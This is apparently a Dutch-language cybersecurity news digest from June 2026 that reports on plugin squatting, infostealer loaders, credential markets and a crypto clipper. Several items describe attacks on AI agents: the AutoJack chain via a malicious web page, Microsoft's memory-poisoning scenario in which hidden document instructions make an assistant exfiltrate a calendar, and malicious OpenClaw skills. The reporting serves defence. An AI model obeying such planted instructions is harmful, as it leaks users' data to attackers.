De kern van dit probleem is een techniek die onderzoekers "scope squatting" noemen, waarbij een plugin wordt gepubliceerd onder een organisatorische namespace die de uitgever niet daadwerkelijk bezit. In systemen zoals npm wordt dit automatisch voorkomen, aangezien alleen geverifieerde leden van een organisatie onder de geregistreerde scope kunnen publiceren. ClawHub documenteerde dezelfde regel in zijn publicatierichtlijnen, maar handhaafde deze niet consistent voor alle plugins in zijn catalogus. Van de 1.508 plugins in de catalogus hebben 557 een `@owner/`-prefix, maar niet allemaal hebben ze geverifieerd eigendom. De 23 geïdentificeerde plugins behoren tot 15 verschillende accounts, waarbij sommige accounts meerdere van deze plugins bezitten.

Pluginnamen zoals `@openclaw/security-gate`, `@openclaw/fiat-wallet` en `@clawhub/aisa-twitter-api` klinken als native tools op platformniveau, wat de misleiding aanzienlijk verdiepte voor iedereen die de plugins doorzocht of scripts gebruikte voor installatie. Zes van de 23 plugins werden door de eigen scanner van ClawHub als verdacht gemarkeerd, maar de overige 17 passeerden als schoon. Ironisch genoeg werd `@openclaw/security-gate`, een plugin voor beveiligingsreview, door de eigen audit van het platform goedgekeurd, ondanks dat deze niet tot OpenClaw behoorde. De handmatige review van Manifold vond geen kwaadaardige code in de doorzochte versies, maar benadrukte dat een toekomstige update van een van deze plugins zonder waarschuwing schadelijk gedrag zou kunnen introduceren.

Het incident met ClawHub weerspiegelt een breder patroon in het ecosysteem van AI-agents, waar snelle groei de beveiligingscontroles die bedoeld zijn om het te beschermen, overtreft. Een enkele plugin kan hooks aanbrengen die prompts of omgevingsvariabelen doorsturen naar externe servers, extra vaardigheden binnenhalen of stilletjes agent-instellingen wijzigen, vaak zonder zichtbaar teken voor de gebruiker. Wanneer die plugins een officieel merkteken dragen dat ze niet hebben verdiend, wordt het risico veel moeilijker te detecteren. Ontwikkelaars die met AI-agents werken, moeten de authenticiteit van plugins zorgvuldig verifiëren vóór installatie, door het publicerende account te kruisverwijzen met de bekende bijdragers van de officiële organisatie. Registers die zijn gebouwd op scope-gebaseerd vertrouwen, moeten het eigendom afdwingen op het moment van publicatie, in plaats van alleen te vertrouwen op audits na publicatie. Na de openbaarmaking door Manifold handelde ClawHub snel door de plugins te verwijderen en een procedure voor namespace-claims te lanceren, een model dat andere registers van AI-plugins zouden moeten overwegen.

De brontekst bevat geen specifieke IoC-artefacten zoals IP-adressen, bestandshashes of kwaadaardige domeinen. De plugin-identificaties die de ongeautoriseerde 'scope squatting'-vermeldingen vertegenwoordigen, zijn echter wel gedocumenteerd door Manifold Security.

 

Bron: Manifold Security

23 juni 2026 | Kritieke kwetsbaarheid in Microsoft AutoGen Studio maakt code-executie mogelijk

Microsoft heeft een kwetsbaarheidsketen, genaamd AutoJack, verholpen in de AutoGen Studio-interface, een onderdeel voor het prototypen van AI-agenten. Deze kwetsbaarheid stelde aanvallers in staat om een AI-agent te manipuleren, waardoor deze willekeurige commando's kon uitvoeren op het hostsysteem van een ontwikkelaar, simpelweg door het bezoeken van een kwaadaardige webpagina. AutoGen Studio is de grafische component voor AutoGen, het open-source framework van Microsoft voor het bouwen van multi-agent AI-systemen. Dit framework stelt ontwikkelaars in staat om AI-agenten te creëren die met elkaar kunnen samenwerken, tools kunnen gebruiken, op het web kunnen browsen, code kunnen uitvoeren, kunnen interageren met API's en verbinding kunnen maken met externe systemen. Het project is populair, met meer dan 59.000 sterren op GitHub.

De impact van AutoJack was beperkt doordat het probleem tijdens de ontwikkelingsfase werd geïdentificeerd en verholpen. Microsoft stelt dat "dit probleem werd geïdentificeerd en verholpen voordat enige PyPI-release plaatsvond, waardoor de getroffen code nooit is opgenomen in een gepubliceerde package." De blootstelling was beperkt tot ontwikkelaars die AutoGen Studio direct vanuit de hoofd GitHub-branch bouwden gedurende een specifieke periode tussen de landing van de MCP-plugin en de hardening-commit.

De AutoJack-aanval berustte op drie afzonderlijke zwakke punten in AutoGen Studio. Ten eerste vertrouwde de MCP WebSocket verbindingen die afkomstig waren van localhost, waardoor een browsing-agent op dezelfde machine kon worden misleid om door de aanvaller gecontroleerde JavaScript te laden dat afkomstig leek van een vertrouwde lokale bron. Ten tweede sloot de authenticatie-middleware van AutoGen Studio de routes `/api/mcp/*` uit van authenticatiecontroles, en het MCP WebSocket-endpoint implementeerde geen eigen authenticatie, waardoor het zonder referenties toegankelijk was. Ten derde accepteerde de MCP WebSocket een base64-gecodeerde `server_params`-waarde uit de URL en gaf deze door aan de code voor het starten van processen, waardoor aanvallers willekeurige PowerShell- of Bash-commando's of uitvoerbare bestanden konden specificeren en uitvoeren.

In een realistisch aanvalsscenario, zoals gedemonstreerd door Microsoft, zou kwaadaardige JavaScript worden uitgevoerd op een pagina die door de AI-agent van een ontwikkelaar werd bezocht. Dit JavaScript zou een WebSocket-verbinding openen naar het lokale MCP-endpoint van AutoGen Studio. De payload zou vervolgens AutoGen Studio instrueren om een door de aanvaller gekozen commando te starten met de privileges van het ontwikkelaarsaccount. Ter demonstratie lanceerde Microsoft de Windows Rekenmachine.

Gebruikers die AutoGen Studio installeerden via de Python Package Index (PyPI) werden nooit blootgesteld aan de kwetsbare code. Het meest recente pakket, autogenstudio 0.4.2.2, bevat de AutoJack-zwakke punten niet. Echter, ontwikkelaars die AutoGen direct vanuit GitHub bouwden gedurende een beperkte periode vóór commit b047730, waren wel kwetsbaar.

Microsoft adviseert gebruikers die AutoGen Studio installeren om het "strikt als een ontwikkelaarsprototype in een geïsoleerde omgeving" te implementeren die niet is blootgesteld aan het internet. Bovendien benadrukt de beheerder dat het project niet mag worden uitgevoerd met een agent die in staat is om te browsen of willekeurige code uit te voeren op een machine met niet-vertrouwde inhoud. Microsoft adviseert om AutoGen Studio te draaien onder een laagbevoorrecht account in een sandboxed gebruikersprofiel of container, zodat elke toekomstige door agenten aangestuurde Remote Code Execution beperkt blijft tot een ontwikkelprofiel en niet het dagelijkse gebruikersaccount.

 

Bron: Microsoft | Bron 2: github.com | Bron 3: hubs.li

23 juni 2026 | Techwebsite Gizmodo gehackt en misbruikt voor ClickFix-aanval

Afgelopen weekend is de toonaangevende techwebsite Gizmodo gehackt en vervolgens door cybercriminelen misbruikt om een zogenaamde ClickFix-aanval uit te voeren op de bezoekers. Dit incident werpt opnieuw licht op de gevaren van dergelijke methoden, zeker gezien de recente gebeurtenissen waarbij via een vergelijkbare ClickFix-aanval persoonlijke gegevens van bijna alle inwoners van de Nederlandse gemeente Epe werden buitgemaakt. De hack van Gizmodo illustreert de aanhoudende dreiging van aanvallen die legitieme platforms misbruiken om kwaadaardige software te verspreiden.

De aanvallers slaagden erin een gebruikersaccount te compromitteren, wat hen de mogelijkheid gaf om een kwaadaardig script direct op de website van Gizmodo te injecteren. Dit script was ontworpen om bezoekers te misleiden. Het presenteerde zich als een noodzakelijke 'captcha' die moest worden opgelost. Echter, de instructies die de gebruikers volgden, leidden niet tot een verificatie, maar resulteerden in de ongemerkte installatie van malware op hun computers. Eenmaal geïnstalleerd, gaf deze malware de aanvallers volledige en ongeautoriseerde controle over de getroffen systemen van de bezoekers.

Gizmodo heeft het beveiligingsincident publiekelijk bevestigd via een verklaring op hun X-account (voorheen bekend als Twitter). Hierin werd gemeld dat de website getroffen was door een inbreuk die resulteerde in de injectie van malafide code. Na de ontdekking van de inbreuk heeft het bedrijf snel gehandeld door de techwebsite offline te halen, het schadelijke script volledig te verwijderen en het gecompromitteerde account grondig te beveiligen. Deze maatregelen waren gericht op het stoppen van de aanval en het voorkomen van verdere schade aan bezoekers.

Hoewel Gizmodo de details van het incident heeft gedeeld, blijft de exacte methode waarmee de aanvallers het gebruikersaccount hebben kunnen compromitteren onbekend. Het bedrijf heeft hierover geen specifieke informatie vrijgegeven. Evenzo is er geen duidelijkheid over het precieze aantal bezoekers dat daadwerkelijk slachtoffer is geworden en wiens systemen met malware zijn geïnfecteerd. Dit gebrek aan informatie maakt een inschatting van de totale impact op individuele gebruikers lastig. Het incident dient als een belangrijke herinnering aan de noodzaak voor zowel websitebeheerders als gebruikers om waakzaam te blijven tegen geavanceerde cyberaanvallen en social engineering technieken.

 

Bron: Gizmodo

23 juni 2026 | Opkomst 'Search Your Target'-markt voor gestolen inloggegevens

Dreigingsactoren maken in toenemende mate gebruik van omvangrijke verzamelingen inloggegevens, afkomstig van infostealers, door deze aan te bieden via doorzoekbare ondergrondse diensten. Kopers kunnen hierdoor specifieke inloggegevens opvragen voor een bepaald bedrijf, platform, domein, geografische regio of accounttype. Dit blijkt uit onderzoek van Flare, dat 470 berichten op ondergrondse forums analyseerde tussen januari 2025 en juni 2026.

De analyse omvatte advertenties, herplaatsingen, feedback van kopers, prijsreferenties en discussies over de kwaliteit en geldigheid van de aangeboden gegevens. De bevindingen wijzen op een gespecialiseerde dienstlaag die fungeert als intermediair tussen infostealer-infecties, de handel in ruwe logs en accountovernameactiviteiten. De dreigingsactoren die deze diensten aanbieden, kunnen worden onderverdeeld in Malware as a Service (MaaS)-aanbieders en MaaS-afnemers. Vaak fungeren zij als makelaars in inloggegevens of gegevensverwerkers, die profiteren van de enorme hoeveelheid logs en hun vermogen om gerichte resultaten te zoeken, filteren, formatteren en leveren uit grote collecties gestolen inloggegevens.

Deze "search your target"-markt biedt een alternatief voor traditionele 'combo lists', waarbij kopers niet langer een complete dump hoeven aan te schaffen, maar specifieke zoekopdrachten kunnen uitvoeren op de bestaande data van een verkoper. De markt vertoont overlap met het ecosysteem van Initial Access Brokers (IAB's). Veelvoorkomende uitvoerformaten zijn onder meer URL:LOGIN:PASS, MAIL:PASS, LOGIN:PASS, PHONE:PASS, MAIL:PHONE en MAIL:LOGIN. Kopersfeedback toonde echter aan dat er een aanzienlijk verschil is tussen wat wordt geadverteerd en de daadwerkelijke resultaten, waarbij de volumes in de praktijk lager zijn en inloggegevens vaak ongeldig, dubbel en minder bruikbaar blijken.

Het proces van deze dienst begint met infostealers die apparaten infecteren en inloggegevens, cookies, autofill-data en browser-artefacten verzamelen. Deze logs worden vervolgens geaggregeerd en opgeslagen in privéclouds, ULP-databases, publieke dumps of uitwisselingsgebaseerde collecties. De "search-service" dreigingsactoren extraheren hierna de gevraagde rijen op basis van de verzoeken van kopers. Kopers valideren vervolgens de inloggegevens en gebruiken deze voor accountovername, fraude, spam, aanvallen met phishing, cryptovalutadiefstal of bedrijfsintrusie. Dit betekent dat de verkopers in deze markt vaak niet de eerste of laatste stap in de keten zijn, maar de verwerkingslaag die "ruwe" gestolen inloggegevens omzet in bruikbaar aanvalsmateriaal. Vanuit een dreigingsinformatieperspectief vertegenwoordigt dit servicemodel een praktisch voorbeeld van T1589.001 (Gather Victim Identity Information: Credentials) en mogelijk T1650 (Acquire Access).

De economie van de "search your target"-markt functioneert vergelijkbaar met die van de DDoS-markt. Een koper stuurt een doelwit, dit kan een bedrijfsdomein, een login-URL, een e-commerce website, een gamingplatform, een applicatie, een geografische markt of een lijst van e-mailadressen zijn, en de verkoper retourneert de overeenkomende inloggegevens. De uitvoer wordt meestal geleverd in formaten zoals URL:LOGIN, URL:LOG, MAIL, LOGIN, PHONE, of andere combinaties. Verschillende verkopers adverteren met de omvang van hun database als verkoopargument; zo beweerde één actor een database van meer dan 5 miljard regels te bezitten, met snelle toegang binnen 10-15 minuten, dagelijkse updates en bronnen die privélogs, privéclouds, persoonlijke streams en publieke data omvatten. Een andere adverteerde een database van meer dan 10 miljard regels en 1TB aan URL:LOG-gegevens.

 

Bron: Flare

23 juni 2026 | Nieuwe OXLOADER malwarelader verspreidt CastleStealer via malafide Google Ads

Onderzoekers van Elastic Security Labs hebben details onthuld van een recente campagne die de CastleStealer informatiedief verspreidt met behulp van een voorheen ongedetecteerde malwarelader, genaamd OXLOADER. De aanval maakt misbruik van malafide Google Ads als startpunt voor de distributie van de malware. Het bewijs suggereert dat de dreigingsactor waarschijnlijk Russischtalig en financieel gemotiveerd is, gezien de expliciete uitsluitingen die voorkomen dat machines in de regio van het Gemenebest van Onafhankelijke Staten (GOS) worden geïnfecteerd. De campagne is aangeduid met de codenaam REF8372.

Volgens onderzoekers Daniel Stepanic en Jia Yu Chan gebruikt de lader meerdere obfuscatietechnieken, waaronder control-flow flattening, opaque predicates en mixed Boolean-Arithmetic. Daarnaast bevat het zelfmodificerende decryptiestubs en misbruikt het de Windows .reloc sectie om shellcode te laden.

De aanval begint wanneer nietsvermoedende gebruikers zoekopdrachten zoals "lts version of node.js" invoeren in zoekmachines zoals Google. Via bedrieglijke advertenties, gepubliceerd onder de geverifieerde naam "ВОЛОДИМИР ТЕРЕЩЕНКО" (vermoedelijk gevestigd in Oekraïne), worden gebruikers omgeleid naar een nepwebsite, "node-js[.]prentiva99[.]info". Het is onbekend of de adverteerdersaccount gekoppeld is aan de daadwerkelijke dreigingsactor, of dat het een frontaccount of gekochte identiteit betreft. De adverteerdersaccount en de bijbehorende advertentiecampagnes zijn op 14 mei 2026 door Google verwijderd.

Gebruikers die interactie hebben met de nepwebsite krijgen een batchscript aangeboden dat gehost wordt op Storj, een gedecentraliseerd, open-source cloudopslagplatform. Dit misbruik van Storj illustreert hoe dreigingsactoren legitieme diensten blijven gebruiken om reputatiefilters op basis van domeinen te omzeilen. Het uitvoeren van het batchscript toont een nep installatiewizard, terwijl op de achtergrond een volgende payload wordt gedownload via een PowerShell commando. Deze payload, de uitvoerbare OXLOADER, wordt eveneens gehost op Storj en wordt uitgevoerd met de parameter -Verb RunAs, wat een Windows User Account Control (UAC) prompt activeert.

De aanval gebruikt vervolgens DLL side-loading om een kwaadaardige DLL te starten, die de CastleStealer payload ontsleutelt en uitvoert. OXLOADER maakt ook gebruik van technieken zoals control-flow flattening (CFF) en mixed Boolean-Arithmetic (MBA) om statische detectie te omzeilen, en neemt maatregelen om te voorkomen dat het in sandbox-omgevingen wordt uitgevoerd. CastleStealer is een .NET informatiedief die eerder werd verspreid samen met CastleLoader, vermomd als een gratis beeldbewerkingstool in een campagne met de codenaam BackgroundFix. CastleLoader wordt toegeschreven aan een dreigingsactiviteitcluster bekend als GrayBravo.

Elastic Security Labs benadrukt dat OXLOADER zich in een vroege operationele fase bevindt, maar de technische ontwikkeling erachter suggereert dat deze malwarefamilie het waard is om te volgen. De code-obfuscation, anti-VM maatregelen, onschuldig ogende code die zijn binaire bestanden maskeert, en unieke stagingtechnieken weerspiegelen weloverwogen technische keuzes om analyse te omzeilen. Deze investering werpt zijn vruchten af, resulterend in lage detectiepercentages bij statische engines en detonatieruns, wat OXLOADER de mogelijkheid geeft om te opereren voordat het wordt opgespoord.

 

Bron: Elastic Security Labs

23 juni 2026 | Legacy infrastructuur vormt achilleshiel voor AI-systemen

Organisaties die hun AI-systemen beveiligen tegen specifieke AI-gerelateerde dreigingen, lopen het risico een cruciale blinde vlek over het hoofd te zien, de kwetsbaarheid van legacy infrastructuur. Deze oudere systemen bieden aanvallers een sluiproute om AI-agents te kapen, zo bleek eerder deze maand tijdens de Gartner Security & Risk Management Summit. De adoptie van AI-agents versnelt, waarbij ongeveer 71% van de organisaties pilotprojecten uitvoert en 31% deze al in productieworkflows heeft geïmplementeerd. Hoewel er aanzienlijke middelen worden geïnvesteerd in de beveiliging van AI-workloads tegen modelvergiftiging, prompt-injectie en datalekken, wordt de onderliggende infrastructuur vaak verwaarloosd.

Een ongepatchte server, een foutief geconfigureerde Active Directory-toestemming, of een in het cachegeheugen opgeslagen authenticatiegegeven op de machine van een ontwikkelaar kunnen directe toegang bieden tot de kennisbanken, cloudopslag, Lambda-functies, SaaS-integraties en de bijbehorende authenticatiegegevens waarvan AI-agents afhankelijk zijn. Dit betekent dat aanvallers de AI zelf niet direct hoeven aan te vallen; zij hoeven enkel de systemen te bereiken waarmee de AI communiceert.

AI-agents functioneren, ondanks hun nieuwheid, op vergelijkbare wijze als andere assets binnen een omgeving. Ze authentiseren via bestaande identiteitsproviders, slaan gegevens op in bestaande cloud-buckets, voeren taken uit via bestaande Lambda-functies en erven machtigingen van bestaande IAM-rollen. Elk van deze afhankelijkheden draagt de technische schuld met zich mee die de organisatie al had vóór de implementatie van AI. Volgens Infosecurity Magazine verleent 70% van de organisaties hun AI-systemen bovendien meer bevoorrechte toegang dan een mens in dezelfde rol. Dit heeft aanzienlijke gevolgen, met een incidentpercentage van 76% voor organisaties met overbevoorrechte AI, vergeleken met slechts 17% voor diegenen die het principe van minimale privileges hanteren.

Deze verbindingen, identiteitsproviders, cloud-buckets, Lambda-functies, IAM-rollen, lopen allemaal via de infrastructuur die al jaren wordt beheerd, zoals Active Directory, cloud-IAM en service-accounts. Deze systemen zijn echter niet ontworpen met AI-agents in gedachten en werden vaak geprovisioneerd lang voordat de eerste AI-agent in productie ging. Het gevolg is dat een aanvaller die via een van deze lagen toegang verkrijgt, de AI zelf niet hoeft aan te raken; de eigen machtigingen van de agent doen het werk voor hen.

Een concreet voorbeeld illustreert hoe een kwetsbaarheid uit 2025 een AI-agent in 2026 kan kapen. In een typische architectuur gebruikt een klantenserviceteam een Co-Pilot met AI-ondersteuning (gehost op AWS Bedrock) om klantgegevens uit Salesforce te bevragen die zijn geëxporteerd naar een S3-bucket. Een ontwikkelaar, John, onderhoudt de agent.

De aanval verloopt in fasen:

1.  **S3-bucket als kritiek asset:** De export van Salesforce-gegevens naar een S3-bucket maakt deze tot een doelwit met gevoelige klantgegevens. Meerdere gebruikers, inclusief ontwikkelaar John, kregen te brede leesrechten op product-S3-buckets.

2.  **Ongepatchte server aan de perimeter:** Een extern toegankelijke server met Apache Tomcat is kwetsbaar voor CVE-2025-24813, een kwetsbaarheid voor remote code execution die in maart 2025 werd bekendgemaakt en toegevoegd aan CISA's catalogus van bekende misbruikte kwetsbaarheden. Deze server werd nooit gepatcht. Door de kwetsbaarheid te exploiteren, kan een aanvaller in het cachegeheugen opgeslagen authenticatiegegevens uit het servergeheugen dumpen en een gebruikersaccount in Active Directory compromitteren.

3.  **Foutieve configuratie van Active Directory:** Het gecompromitteerde gebruikersaccount in Active Directory kan misbruik maken van een foutieve configuratie van Resource-Based Constrained Delegation om John te imiteren en toegang te krijgen tot zijn werkstation. John gebruikt AWS CLI om cloudbronnen van de Co-Pilot te beheren, waarbij AWS-toegangssleutels op zijn machine worden opgeslagen. De aanvaller verzamelt deze sleutels.

Door deze drie fasen te verbinden, kan een aanvaller CVE-2025-24813 aan de perimeter exploiteren, authenticatiegegevens dumpen, lateraal bewegen via Active Directory naar Johns werkstation, zijn AWS-toegangssleutels oogsten en elke record in de product-S3-bucket lezen. Omdat deze bucket de kennisbank van de Co-Pilot voedt, is de AI-agent gecompromitteerd. De aanvaller kan nu bepalen wat de AI leest, wat het vertrouwt en wat het aan gebruikers retourneert. Geen enkel deel van de AI-stack werd direct aangevallen. Drie afzonderlijke kwetsbaarheden, een overbevoorrechte cloudtoegangssleutel, een ongepatchte webserver en een foutieve configuratie van Active Directory, vormden samen één kritiek aanvalspad. Dit toont aan dat beveiligingsprogramma's die elke laag onafhankelijk beoordelen, de onderlinge verbindingen en daarmee de aanvalspaden missen.

 

Bron: nvd.nist.gov | Bron 2: gartner.com | Bron 3: infosecurity-magazine.com

23 juni 2026 | Scammers manipuleren online platforms om crypto clipper te verspreiden

Een nieuwe aanval, ontdekt door cybersecuritybedrijf Check Point, toont aan hoe ver cybercriminelen gaan om hun malware populair en betrouwbaar te doen lijken. Onderzoekers hebben vastgesteld dat een enkele dreigingsactor, opererend onder de naam @JoseCmanXD, meerdere online platforms heeft gemanipuleerd om een gevaarlijke crypto clipper te promoten, ontworpen om cryptocurrency te stelen.

Een clipper is malware die het klembord kaapt. Wanneer een gebruiker een cryptocurrency walletadres kopieert, vervangt de malware dit adres stilletjes door het walletadres van de aanvaller voordat de gebruiker het plakt. Als het slachtoffer de wijziging niet opmerkt, gaat de cryptobetaling naar de hacker in plaats van naar de beoogde ontvanger.

De operatie richt zich op eigenaren van cryptocurrency en gokkers die snelle winsten zoeken via valse hulpprogramma's, zoals sniperbots voor Solana, voorspellers voor crashgames en een "Aviator Predictor". In plaats van zich te verbergen, gedroeg de hacker zich als een marketeer om een valse reputatie op te bouwen. Verder onderzoek wees uit dat de aanvaller spooknetwerken van nepaccounts gebruikte om statistieken op te blazen. Op GitHub gaven gekoppelde ontwikkelaarsaccounts, zoals Decryptor-j en crash-predictor1, repositories meer dan 140 sterren, waardoor het aantal downloads de 5.000 overschreed.

Op SourceForge, een webdienst die een gecentraliseerd software ontdekkingsplatform biedt, werd de downloadteller opgekrikt tot meer dan 44.000. Om de geloofwaardigheid te maximaliseren, gebruikten de scammers een YouTube-kanaal met realistische desktop-tutorials, waarbij door computers gegenereerde vertellers met AI werden gekoppeld aan nepweergaven en gecoördineerde positieve reacties.

Het meest zorgwekkende aspect van deze campagne is de manier waarop vertrouwde beveiligingsplatforms werden misbruikt. Onderzoekers meldden dat de dreigingsactor nepaccounts op VirusTotal gebruikte om positieve stemmen en opmerkingen te plaatsen, waarin werd beweerd dat de bestanden schoon waren. VirusTotal wordt veel gebruikt door beveiligingsteams om verdachte bestanden en links te controleren. In combinatie met malware die antivirusprogramma's niet detecteerden, creëerden deze valse signalen een vals gevoel van veiligheid. De scammers slaagden er zelfs in om op 27 april promotionele artikelen te laten publiceren op legitieme nieuwswebsites, naast posts op populaire crypto forums zoals BitcoinTalk, wat hun val ultieme geloofwaardigheid gaf.

Achter alle valse lof schuilt de daadwerkelijke payload, gevaarlijke malware gebaseerd op Rust, bekend als een klembordkaper. Wanneer een slachtoffer het ZIP-archief downloadt op een Windows-computer, start een loader van .NET, genaamd SniperBot_Premium(Free).exe, het hoofdbestand, silkebin.exe. Op macOS-systemen forceert een script genaamd unlocker.command het apparaat om de native Gatekeeper-beveiligingen te omzeilen, zodat de malware kan worden uitgevoerd. Eenmaal actief draait de malware stilletjes op de achtergrond en bewaakt het klembord.

De clipper wacht totdat de gebruiker een lange reeks tekens kopieert die lijkt op een cryptocurrency walletadres. Vervolgens wordt dit snel en geruisloos vervangen door een van de 15.500 door aanvallers beheerde wallets die al in de code zijn ingebed. Als de gebruiker het adres niet dubbel controleert voordat de betaling wordt verzonden, gaan de fondsen rechtstreeks naar de scammers.

Check Point onderzoekers waarschuwen dat engagementstatistieken zoals likes, sterren en positieve reacties gemakkelijk kunnen worden gekocht of vervalst, en dat populariteit nooit moet worden verward met veiligheid. Het rapport concludeert dat vanuit het perspectief van de gebruiker de mogelijkheid om sentiment en reputatie op platforms zoals VirusTotal te manipuleren een belangrijke evolutie markeert in hoe dreigingsactoren vertrouwen vormgeven. Hoewel deze campagne niet primair gericht is op grote ondernemingen, toont het aan dat aanvallers niet langer alleen afhankelijk zijn van klassieke malwaredistributietechnieken om slachtoffers te bereiken. In plaats daarvan kunnen ze reputatiesystemen, crowdsourced feedback en cross-platform promotie manipuleren om argwaan te verminderen en meer gebruikers aan te trekken.

 

Bron: Check Point

23 juni 2026 | Microsoft waarschuwt voor nieuwe AI-geheugen aanvalsvector

AI-systemen evolueren van statische tools naar lerende samenwerkingspartners door de introductie van AI-geheugen. Hoewel dit krachtige nieuwe mogelijkheden ontsluit, vergroot het ook het aanvalsoppervlak van deze systemen aanzienlijk. Zonder geheugen moeten aanvallers hun doel bereiken met een enkele prompt, maar met AI-geheugen kunnen zij het gedrag van een systeem geleidelijk beïnvloeden of 'herinneringen' planten die de redenering van de AI beïnvloeden, zelfs nadat de oorspronkelijke context verdwenen is en de gebruiker minder alert is.

Microsoft hanteert een diepgaande verdedigingsstrategie om AI-geheugen te beschermen, die alle lagen van de stack omvat, opslag, ophalen, modelinteractie en gebruikerscontrole. AI-systemen gebruiken geheugen om informatie tussen interacties vast te houden en op te roepen, wat vervolgens toekomstig gedrag vormgeeft. Dit geheugen dient twee doelen, het slaat waardevolle gebruikersinformatie op en moet worden beschermd als klantgegevens, en het vormt het gedrag van de agent en stuurt tool-aanroepen, wat dezelfde strenge governance vereist als elk systeem dat tot actie kan overgaan. Geheugenbeheer is complex, aangezien geheugengebeurtenissen vaak asynchroon van gebruikersinteracties plaatsvinden, wat traditionele "human-in-the-loop" patronen verandert.

De aanwezigheid van AI-geheugen verandert het dreigingsmodel fundamenteel. Waar aanvallers voorheen in één prompt moesten 'winnen', kunnen zij nu een aanval over langere tijd opzetten. Eenmaal gecompromitteerd, kan geheugen gedrag triggeren buiten de oorspronkelijke context. Omdat aanvallen op AI-geheugen buiten hun initiële context plaatsvinden, zijn verdedigingsmechanismen vaak minder effectief en is forensisch onderzoek moeilijker.

Een hypothetisch scenario illustreert dit risico, een gebruiker opent een gedeeld document. De opmaak bevat verborgen instructies, ingebed door een aanvaller, gericht op de AI-assistent. Deze instructies geven de AI de opdracht om de agenda van de gebruiker te exfiltreren. De assistent verwerkt het document, maar onderneemt geen onmiddellijke actie. Dagen later, tijdens een ongerelateerd gesprek, activeren deze slapende kwaadaardige instructies uit de eerdere sessie, waardoor de assistent zijn geheugen bijwerkt met door de aanvaller gedefinieerde inhoud. De aanvaller ontvangt nu alle updates van de agenda van de gebruiker. Dit fenomeen wordt 'uitgestelde tool-aanroep' genoemd, de kracht van de aanval ligt in de tijdelijke kloof tussen blootstelling en uitvoering.

Microsoft heeft bescherming ingebouwd om deze patronen te detecteren en te mitigeren. Geheugens passeren saneringscontroles tijdens het schrijven. Eigen classificeerders voor prompt-injectie van Microsoft inspecteren inhoud op kwaadaardige input en verwijderen deze voordat iets wordt opgeslagen. M365 Copilot is ontworpen om "Task Adherence" controles uit te voeren bij elke expliciete geheugenwrite. Deze controles identificeren afwijkingen, zoals verkeerd uitgelijnde tool-aanroepen ten opzichte van de gebruikersintentie, wat de impact van prompt-injectie voor de geheugentool-aanroep vermindert. Personalisatie met behulp van AI-geheugen kan worden beheerd via beleid op tenantniveau.

Eenmaal opgeslagen, worden geheugens beheerd door het databeleid dat beschikbaar is binnen M365, zoals "Data Subject Requests" (DSR) en tenantisolatie. Ze volgen dezelfde beveiligings- en compliancebeleid als andere mailboxgegevens, zoals "Customer Lockbox" en versleuteling in rust. M365 Copilot registreert wanneer een geheugen wordt bijgewerkt in organisatorische auditlogboeken. Het doel is end-to-end traceerbaarheid, van de broninhoud die Copilot heeft verwerkt, tot wat het heeft gekozen om te onthouden, tot hoe die herinnering latere interacties heeft beïnvloed.

SOC-analisten kunnen vandaag de dag het veld "MemoryUpdated", beschikbaar in Defender Advanced Hunting, Defender Sentinel en Azure Portal Sentinel Analytics, combineren met hun bestaande analyses om incidenten te prioriteren en nieuwe alerts te bouwen op geheugenactiviteit. Microsoft blijft actief investeren in de beveiliging van AI-geheugen als een doorlopend, iteratief programma. De beschreven beschermingen en zichtbaarheid weerspiegelen de huidige mogelijkheden, waarbij verdere verharding en verrijking gaande zijn. Deze casestudy is gebaseerd op MSRC-gevallen van Johann Rehberger, Håkon Måløy en Gal Zror. Microsoft dankt de beveiligingsonderzoekers die hebben bijgedragen aan betere geheugenontwerppraktijken door middel van gecoördineerde kwetsbaarheidsopenbaarmaking.

 

Bron: Microsoft

24 juni 2026 | Nieuwe AI agent bedreiging OpenClaw misbruikt voor malware en dataverlies

Onderzoekers van Unit 42, het dreigingsonderzoekscentrum van Palo Alto Networks, hebben aanhoudende kwaadaardige activiteiten vastgesteld binnen het OpenClaw AI agent ecosysteem. OpenClaw is een AI agent die 'skills' of vaardigheden uitvoert die afkomstig zijn van ClawHub, een speciale marktplaats. Deze skills hebben uitgebreide toegang tot lokale systemen, wat ClawHub tot een kritieke schakel maakt in de software supply chain van agenten met AI.

Na de lancering van OpenClaw werden al diverse kwaadaardige campagnes waargenomen. Eerdere bevindingen, gepubliceerd in februari 2026, leidden ertoe dat ClawHub zowel VirusTotal als ClawScan integreerde. Deze tools waren bedoeld om proactieve screening van gepubliceerde skills en code analyse mogelijk te maken, met als doel kwaadaardige skills te blokkeren voor download.

Desondanks toonde een analyse van Unit 42, uitgevoerd van februari tot en met mei 2026, aan dat er nog steeds hardnekkige en ontwijkende kwaadaardige skills op ClawHub aanwezig waren. De onderzoekers identificeerden vijf van dergelijke skills die niet waren geblokkeerd. Deze werden allemaal gerapporteerd aan ClawHub voor verwijdering. Naar aanleiding van de meldingen heeft OpenClaw de betreffende accounts verbannen en alle gerapporteerde skills verwijderd.

De vijf geïdentificeerde skills vielen uiteen in drie verschillende categorieën van dreigingen, die het ecosysteem van de AI supply chain misbruiken:

Ten eerste waren er infostealers. Twee van de skills waren specifiek ontworpen om macOS infostealers te leveren. Beide maakten verbinding met command-and-control (C2) infrastructuur, wat duidt op voortdurende activiteit van dreigingsactoren.

Ten tweede werd een ontwijkingstechniek waargenomen. Eén skill had een opzettelijk opgeblazen bestandsgrootte, waardoor deze de drempelwaarden van scanners overschreed en zowel ClawScan als VirusTotal detectie omzeilde.

Ten derde werden er 'agentic threats' geïdentificeerd. Twee skills vertegenwoordigden nieuwe agentic bedreigingen: runtime agentic affiliate injection en agentic front-running. Dit zijn innovatieve technieken die de auteurs van de skills gebruikten voor financieel gewin.

In reactie op deze bevindingen werkt OpenClaw nu samen met NVIDIA. Deze samenwerking heeft tot doel gedetailleerde documentatie te verschaffen over de functionaliteit van elke skill en om NVIDIA’s analysetool op alle skills uit te voeren. Klanten van Palo Alto Networks zijn beter beschermd tegen de besproken dreigingen dankzij producten en diensten zoals Koi Agentic Endpoint Security (AES).

 

Bron: Unit 42 | Bron 2: bitdefender.com | Bron 3: openclaw.ai

24 juni 2026 | Grootschalige FortiBleed-operatie oogst 110 miljoen inloggegevens van FortiGate firewalls

